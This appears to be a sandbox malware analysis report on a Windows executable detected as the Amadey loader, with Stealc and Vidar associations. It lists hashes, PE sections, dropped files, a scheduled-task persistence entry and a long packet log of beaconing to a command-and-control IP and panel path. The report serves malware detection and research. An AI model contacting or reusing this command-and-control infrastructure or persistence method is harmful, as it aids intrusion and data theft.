                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@5/3@0/1
                    EGA Information:
                    • Successful, ratio: 25%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target axplong.exe, PID 4140 because there are no executed function
                    • Execution Graph export aborted for target axplong.exe, PID 6464 because there are no executed function
                    • Execution Graph export aborted for target file.exe, PID 4488 because it is empty
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    Time | Type | Description
                    03:06:06 | Task Scheduler | Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    21:07:01 | API Interceptor | 182841x Sleep call for process: axplong.exe modified
                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                    185.215.113.16 | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                    | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                    | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                    | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                    | file.exe | malicious | Amadey, DarkTortilla | 185.215.113.16/Jo89Ku7d/index.php
                    | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                    | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                    | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                    | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                    | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.16/Jo89Ku7d/index.php
                    No context
                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                    WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                    | file.exe | malicious | Amadey | 185.215.113.16
                    | file.exe | malicious | Stealc | 185.215.113.37
                    | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                    | file.exe | malicious | Amadey | 185.215.113.16
                    | file.exe | malicious | Amadey | 185.215.113.16
                    | file.exe | malicious | Stealc | 185.215.113.37
                    | file.exe | malicious | Stealc | 185.215.113.37
                    | file.exe | malicious | Amadey | 185.215.113.16
                    | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                    No context
                    No context
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):1877504
                    Entropy (8bit):7.948285066531552
                    Encrypted:false
                    SSDEEP:49152:JfTSJzuwiqQdaKeQRJ7jLF7qtxaoRDPIQdbnAILUtCtxxwdL:wJFzQf1/oRDIQdDfk51
                    MD5:5E8202D139D4F31CF0637105BFB93FCC
                    SHA1:7A73D8AED5A165C4A4DB627C753AE092A6407DE2
                    SHA-256:8278C069E0FD88B41B19CF1D85FDC26CBF6947716F53A72491CB4792C20A3C56
                    SHA-512:0A5230E4D1B698DACE5B010AB9F58F7E669B447ECB109DBF7F56A1176138146D50CBE2D89F5D4FD8166B64545F6556E613F47CC1EF77726698F89CEAB96E6CCF
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 50%
                    • Antivirus: Virustotal, Detection: 53%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f.............................0J...........@..........................`J.....bG....@.................................W...k...........................(.J...............................J..................................................... . ............................@....rsrc...............................@....idata ............................@... ..).........................@...amswznhi......0.....................@...zlhbfepu..... J.....................@....taggant.0...0J.."..................@...........................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:[ZoneTransfer]....ZoneId=0
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):304
                    Entropy (8bit):3.405246776669828
                    Encrypted:false
                    SSDEEP:6:LbXlXUEZ+lX1lOJUPelkDdtE9+AQy0lb0lEt0:X1Q1lOmeeDs9+nVwlEt0
                    MD5:1A481074B932A17FE84A6E2F7818858E
                    SHA1:CAC19B522C9071B4D18F3A4270DF5D355DB6F0D3
                    SHA-256:D947ED01284290EC68A4F45358EB240412632B2AC8297DB34247994925A3BCF3
                    SHA-512:5A178F09B42F2CCF27B17FE4B010D8891DDDEEF33C04187A91B19437531E048FBC770D10A92D6973E055B8276D018D924115B00CB7691E567E6CB7E705268F77
                    Malicious:false
                    Reputation:low
                    Preview:.......z3..O.....uzrF.......<... .....s.......... ....................<.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0...................@3P.........................
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.948285066531552
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:1'877'504 bytes
                    MD5:5e8202d139d4f31cf0637105bfb93fcc
                    SHA1:7a73d8aed5a165c4a4db627c753ae092a6407de2
                    SHA256:8278c069e0fd88b41b19cf1d85fdc26cbf6947716f53a72491cb4792c20a3c56
                    SHA512:0a5230e4d1b698dace5b010ab9f58f7e669b447ecb109dbf7f56a1176138146d50cbe2d89f5d4fd8166b64545f6556e613f47cc1ef77726698f89ceab96e6ccf
                    SSDEEP:49152:JfTSJzuwiqQdaKeQRJ7jLF7qtxaoRDPIQdbnAILUtCtxxwdL:wJFzQf1/oRDIQdDfk51
                    TLSH:D39533ABAF6C6588D1EEC031AC2762D6D23A20DE9FDE310B856C0532574E567FCB1C64
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                    Icon Hash:00928e8e8686b000
                    Entrypoint:0x8a3000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                    Instruction
                    jmp 00007F1B7515B6DAh
                    je 00007F1B7515B6F2h
                    add byte ptr [eax], al
                    jmp 00007F1B7515D6D5h
                    add byte ptr [0B2595C2h], cl
                    add byte ptr [eax], al
                    add byte ptr [edi-07FFC2CDh], al
                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6a057 | 0x6b | .idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x69000 | 0x1e0 | .rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4a1a28 | 0x10 | amswznhi
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x4a19d8 | 0x18 | amswznhi
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                    (unnamed) | 0x1000 | 0x68000 | 0x2de00 | bfc47b2ec95b0f01a098a6d3db89d648 | False | 0.9975359758174387 | data | 7.98822985623302 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc | 0x69000 | 0x1e0 | 0x200 | f53f2b91dec392e986468774843ffc62 | False | 0.57421875 | data | 4.450239173749085 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata | 0x6a000 | 0x1000 | 0x200 | cc76e3822efdc911f469a3e3cc9ce9fe | False | 0.1484375 | data | 1.0428145631430756 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    (unnamed) | 0x6b000 | 0x29e000 | 0x200 | ab360c4d1537617559a9e061ce7fb50b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    amswznhi | 0x309000 | 0x199000 | 0x198c00 | ed66f6e897eaa8bd91ea386d4917c4a8 | False | 0.9942809871941896 | data | 7.951896268933144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    zlhbfepu | 0x4a2000 | 0x1000 | 0x400 | 7633e08cf2b43f5653b62df35b517eb2 | False | 0.83203125 | data | 6.4671737786603245 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .taggant | 0x4a3000 | 0x3000 | 0x2200 | 06685e5360226857c6ef845b684d4d8e | False | 0.06640625 | DOS executable (COM) | 0.8775301686417039 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                    RT_MANIFEST | 0x4a1a38 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727

                    DLL | Import
                    kernel32.dll | lstrcpy

                    Language of compilation system | Country where language is spoken
                    English | United States
                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                    2024-09-27T03:07:07.692961+0200 | 2856147 | ETPRO MALWARE Amadey CnC Activity M3 | 1 | 192.168.2.6 | 56628 | 185.215.113.16 | 80 | TCP
                    Sep 27, 2024 03:07:06.647269964 CEST5662780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:06.652081966 CEST8056627185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:06.869190931 CEST8056627185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:06.869277000 CEST5662780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:06.989691973 CEST5662780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:06.990010023 CEST5662880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:06.994860888 CEST8056628185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:06.994925022 CEST5662880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:06.995028019 CEST8056627185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:06.995068073 CEST5662780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:06.995167017 CEST5662880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:06.999906063 CEST8056628185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:07.692848921 CEST8056628185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:07.692960978 CEST5662880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:07.693691015 CEST5662880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:07.698554039 CEST8056628185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:07.919451952 CEST8056628185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:07.919519901 CEST5662880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:08.020742893 CEST5662880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:08.021065950 CEST5662980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:08.026195049 CEST8056629185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:08.026295900 CEST5662980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:08.026561022 CEST5662980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:08.026616096 CEST8056628185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:08.026667118 CEST5662880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:08.031451941 CEST8056629185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:08.732630968 CEST8056629185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:08.732861996 CEST5662980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:08.733555079 CEST5662980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:08.738354921 CEST8056629185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:08.964117050 CEST8056629185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:08.964354992 CEST5662980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:09.067715883 CEST5662980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:09.068336010 CEST5663080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:09.072917938 CEST8056629185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:09.073064089 CEST5662980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:09.073163033 CEST8056630185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:09.073431969 CEST5663080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:09.073431969 CEST5663080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:09.078238964 CEST8056630185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:09.772164106 CEST8056630185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:09.772229910 CEST5663080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:09.802272081 CEST5663080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:09.807102919 CEST8056630185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:10.029757977 CEST8056630185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:10.029834032 CEST5663080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:10.145850897 CEST5663080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:10.146212101 CEST5663180192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:10.152210951 CEST8056631185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:10.152316093 CEST5663180192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:10.152379036 CEST8056630185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:10.152431965 CEST5663080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:10.152601957 CEST5663180192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:10.158690929 CEST8056631185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:10.842747927 CEST8056631185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:10.842853069 CEST5663180192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:10.843728065 CEST5663180192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:10.848460913 CEST8056631185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:11.066420078 CEST8056631185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:11.066473007 CEST5663180192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:11.179280043 CEST5663180192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:11.179594040 CEST5663280192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:11.184536934 CEST8056632185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:11.184640884 CEST5663280192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:11.184679031 CEST8056631185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:11.184727907 CEST5663180192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:11.184969902 CEST5663280192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:11.189701080 CEST8056632185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:11.914814949 CEST8056632185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:11.914937019 CEST5663280192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:11.915779114 CEST5663280192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:11.920579910 CEST8056632185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:12.147262096 CEST8056632185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:12.147334099 CEST5663280192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:12.255439043 CEST5663280192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:12.255784035 CEST5663380192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:12.260579109 CEST8056632185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:12.260656118 CEST5663280192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:12.260678053 CEST8056633185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:12.260741949 CEST5663380192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:12.260907888 CEST5663380192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:12.265983105 CEST8056633185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:12.969038010 CEST8056633185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:12.969152927 CEST5663380192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:12.970021963 CEST5663380192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:12.976078987 CEST8056633185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:13.196770906 CEST8056633185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:13.196906090 CEST5663380192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:13.302000999 CEST5663380192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:13.302376986 CEST5663480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:13.307411909 CEST8056634185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:13.307496071 CEST5663480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:13.307682991 CEST5663480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:13.308439970 CEST8056633185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:13.308490992 CEST5663380192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:13.312446117 CEST8056634185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:14.036765099 CEST8056634185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:14.036850929 CEST5663480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:14.037873983 CEST5663480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:14.042643070 CEST8056634185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:14.272277117 CEST8056634185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:14.272383928 CEST5663480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:14.380193949 CEST5663480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:14.380517960 CEST5663580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:14.385425091 CEST8056634185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:14.385508060 CEST5663480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:14.385682106 CEST8056635185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:14.385749102 CEST5663580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:14.385904074 CEST5663580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:14.392374992 CEST8056635185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:15.076287985 CEST8056635185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:15.076359987 CEST5663580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:15.077049971 CEST5663580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:15.081799984 CEST8056635185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:15.300765991 CEST8056635185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:15.300950050 CEST5663580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:15.414186001 CEST5663580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:15.414511919 CEST5663680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:15.421559095 CEST8056636185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:15.421659946 CEST5663680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:15.421773911 CEST5663680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:15.422142029 CEST8056635185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:15.422290087 CEST5663580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:15.427998066 CEST8056636185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:16.111293077 CEST8056636185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:16.111401081 CEST5663680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:16.114751101 CEST5663680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:16.119585037 CEST8056636185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:16.337707996 CEST8056636185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:16.337786913 CEST5663680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:16.442656040 CEST5663680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:16.443025112 CEST5663780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:16.448127031 CEST8056636185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:16.448165894 CEST8056637185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:16.448225975 CEST5663680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:16.448296070 CEST5663780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:16.448446989 CEST5663780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:16.453202963 CEST8056637185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:17.138154984 CEST8056637185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:17.138268948 CEST5663780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:17.139090061 CEST5663780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:17.144826889 CEST8056637185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:17.362603903 CEST8056637185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:17.363352060 CEST5663780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:17.475263119 CEST5663780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:17.476231098 CEST5663880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:17.480499983 CEST8056637185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:17.481055975 CEST8056638185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:17.481190920 CEST5663780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:17.481307030 CEST5663880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:17.481440067 CEST5663880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:17.486272097 CEST8056638185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:18.191874027 CEST8056638185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:18.191998005 CEST5663880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:18.193197012 CEST5663880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:18.198318958 CEST8056638185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:18.419306040 CEST8056638185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:18.419431925 CEST5663880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:18.521003008 CEST5663880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:18.521455050 CEST5663980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:18.528031111 CEST8056638185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:18.528048992 CEST8056639185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:18.528126955 CEST5663880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:18.528419971 CEST5663980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:18.528597116 CEST5663980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:18.533632040 CEST8056639185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:19.222018957 CEST8056639185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:19.222167969 CEST5663980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:19.222898960 CEST5663980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:19.228339911 CEST8056639185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:19.446369886 CEST8056639185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:19.446645975 CEST5663980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:19.553915024 CEST5663980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:19.554194927 CEST5664080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:19.560189962 CEST8056639185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:19.560283899 CEST5663980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:19.560626030 CEST8056640185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:19.560728073 CEST5664080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:19.560893059 CEST5664080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:19.569118023 CEST8056640185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:20.274652958 CEST8056640185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:20.274758101 CEST5664080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:20.282001019 CEST5664080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:20.288177967 CEST8056640185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:20.510822058 CEST8056640185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:20.510929108 CEST5664080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:20.614434958 CEST5664080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:20.614799023 CEST5664280192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:20.619613886 CEST8056640185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:20.619700909 CEST5664080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:20.619898081 CEST8056642185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:20.619971991 CEST5664280192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:20.620178938 CEST5664280192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:20.625171900 CEST8056642185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:21.349457026 CEST8056642185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:21.349530935 CEST5664280192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:21.350250959 CEST5664280192.168.2.6185.215.113.16
